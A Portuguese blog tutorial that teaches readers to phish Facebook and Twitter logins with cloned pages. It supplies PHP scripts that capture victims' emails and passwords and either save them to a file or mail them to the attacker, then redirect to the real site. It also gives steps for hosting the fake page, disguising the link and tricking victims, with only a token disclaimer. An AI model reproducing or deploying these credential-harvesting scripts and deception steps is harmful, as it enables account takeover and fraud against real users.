quarta-feira, 8 de janeiro de 2014
OBS: Esse tutorial recomenda que tenham um bom conhecimento sobre as linguagens HTML e PHP, para utilizá-lo.
Para a alegria dos “lammers”, está aqui o tutorial onde eu ensinarei como hackear logins de algumas redes sociais, com páginas falsas.
Nessa postagem eu ensinarei a hackear páginas de Facebooke Twitter, pelos vários pedidos dos leitores do site.
OBS: Se você é uma pessoa que têm caráter e responsável pelos teus atos, utilize esse tutorial como conhecimento e não para ficar hackeando “logins” por aí, por brincadeira!
Para quem se lembra de uma postagem anterior onde eu ensino a hackear “logins” de contas de Orkut, este será em um modo bem diferente, más nesta postagem a vítima também terá que ser uma pessoa desatenciosa e que caia na armadilha facilmente.
OBS: Lembre-se que a qualquer momento você não pode está logado na sua conta do Facebook ou Twitter, lá pro final do tutorial eu explico o porquê.
Então vamos ao tutorial:
1) Abra uma nova aba e acesse um link de qualquer fã page que você conheça, ou que você administra no Facebook (www.facebook.com/...???). Já se for pra hackear pelo Twitter, acesse o link do seu perfil no site (www.twitter.com/...???).
2) Se você utiliza o navegador “Internet Explorer”, você terá que clicar com o botão direito de seu mouse no meio da página, e vá na opção “Exibir Código-fonte” (o código HTML da página). Más se o seu for o “Mozilla Firefox”, apenas dê “Ctrl+U” em seu teclado, e em seguida, ao abrir, selecione tudo (Ctrl+A) e copie-o (Ctrl+C).
3) Abra um novo arquivo de “Bloco de notas”, e cole (Ctrl+V) o código HTML. Minimize o arquivo, por enquanto, porque nós utilizaremos mais tarde.
1° Método
1) Se você quer receber o login da vítima em um arquivo de texto, salvo em seu PC, abra um novo arquivo de “Bloco de Notas”, não digite nada, apenas vá a aba “Arquivo” e clique em “salvar” com o nome “logins”.
2) Abra um novo arquivo de “Bloco de notas”, e cole o seguinte código abaixo:
Se a sua página for à do Facebook, digite o seguinte código:
<?php
$nomearquivo ="logins.txt";
$email =$_POST["email"];
$senha =$_POST["pass"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="<br><br>";
$ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."
<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
$abre =@fopen("logins.txt","a+");
$escreve =fwrite($abre, $ess);
echo "<script>javascript:document.location='http://www.facebook.com'
</script>";
?>
Já se a sua página for à do Twitter, o código é o seguinte:
<?php
$nomearquivo ="logins.txt";
$email =$_POST["session[username_or_email]"];
$senha =$_POST["session[password]"];
$browser =$_SERVER['HTTP_USER_AGENT'];
$data =date("Y-m-d");
$hora =date("H:i:s");
$traco ="<br><br>";
$ess ="Email: ".$email."<br>Senha: ".$senha."<br>Navegador: ".$browser."
<br>Data: ".$data."<br>Hora: ".$hora."<br>".$traco;
$abre =@fopen("logins.txt","a+");
$escreve =fwrite($abre, $ess);
echo "<script>javascript:document.location='http://www.twitter.com'
</script>";
?>
3) Salve-o com o nome “save.php”.
2° Método:
1) Já se você deseja receber o login por e-mail, abra um novo arquivo de “Bloco de notas”, e cole o seguinte código abaixo:
Se a sua página for à do Facebook, digite o seguinte código:
<HTML><?
$email =$_POST["email"];
$senha =$_POST["pass"];
$destinatario ="DIGITE O SEU E-MAIL AKI";
$Titulo="Login da vítima hackeado"
$mensagem1="
E-mail: $email
Senha: $senha";
mail ("$Destinatario", "$Titulo", "$mensagem1", "From:$email");
?>
<script language="JavaScript">
javascript:document.location='http://www.facebook.com'
</script>
</HTML>
Já se a sua página for à do Twitter, o código é o seguinte:
<HTML><?
$email =$_POST["session[username_or_email]"];
$senha =$_POST["session[password]"];
$destinatario =" DIGITE O SEU E-MAIL AKI";
$Titulo="Login da vítima hackeado"
$mensagem1="
E-mail: $email
Senha: $senha";
mail ("$Destinatario", "$Titulo", "$mensagem1", "From:$email");
?>
<script language="JavaScript">
javascript:document.location='http://www.twitter.com'
</script>
</HTML>
2) Salve-o com o nome “envia.php”.
Depois de escolher entre os dois métodos, agora vamos publicar o arquivo PHP na internet. Para isso você precisa se cadastrar e hospedar a página entre o site de hospedagem grátis abaixo:
Já hospedado o arquivo PHP, copie o link da arquivo, e volte ao código HTML da página do Facebook ou Twitter, que você colou no arquivo de “Bloco de Notas”. Agora dê “Ctrl+F” (Localizar), e digite no campo de descrição a palavra “action” e clique em “Localizar próxima” só uma vez (caso a sua página for do Twitter, terá que clicar três vezes). Marcado na imagem abaixo substitua o link de login do Facebook ou Twitter, e entre as aspas, cole o arquivo PHP que você hospedou agora pouco.
Agora é só publicar a página fake do Facebook ou Twitter, no site de hospedagem abaixo, o mesmo que utilizamos no tutorial anterior para hackear logins de contas de Orkut:
Paste HTML => http://pastehtml.com/
10) Para camuflar o link da página fake, envie para a vítima, deixando igual ao exemplo abaixo:
[link=coloque aki o link da página fake]QUALQUER FRASE QUE VOCÊ DESEJA DIGITAR AKI[/link]
OBS: Como eu falei no começo do tutorial, eu recomendo que utilizem um link de qualquer fã page do Facebook para ficar mais fácil de enganar a vítima, e enrolando ela, dizendo que você tá divulgando para os seus amigos ou crie sua própria fã page, tanto faz, más que você seja esperto, e saiba enganá-lo. O mesmo eu falo do Twitter, diga a vítima que você está divulgando seu perfil, para a vítima lhe seguir, etc.
Lembre-se de copiar o código HTML, da fã page, quando não estiver logado, na sua conta do Facebook ou Twitter, porque só assim você poderá alterar as tags onde estará o login da página). ;D
Lembre-se de copiar o código HTML, da fã page, quando não estiver logado, na sua conta do Facebook ou Twitter, porque só assim você poderá alterar as tags onde estará o login da página). ;D
Para finalizar, eu deixo uma recomendação importante, se você escolheu o primeiro método, guarde os três arquivos em uma pasta, não os exclua ou modifique-os para outro destino, que depois de hospedados, o site necessita do destino dos arquivos, em que as informações de logins serão salvas no arquivo “logins.txt”, modificando-os, os dados não serão salvos. Caso aconteça, você não terá mais sucesso com o método.
Agora é só testá-lo, e se a vítima cair na armadilha, e digitar o seu “login”, na página fake, você receberá os dados dela, salvos no arquivo “logins.txt” ou por email, dependendo do método que você escolheu acima.
Dúvidas? Deixem comentários aê!
Espero ter ajudado à tds vcs, vlw!
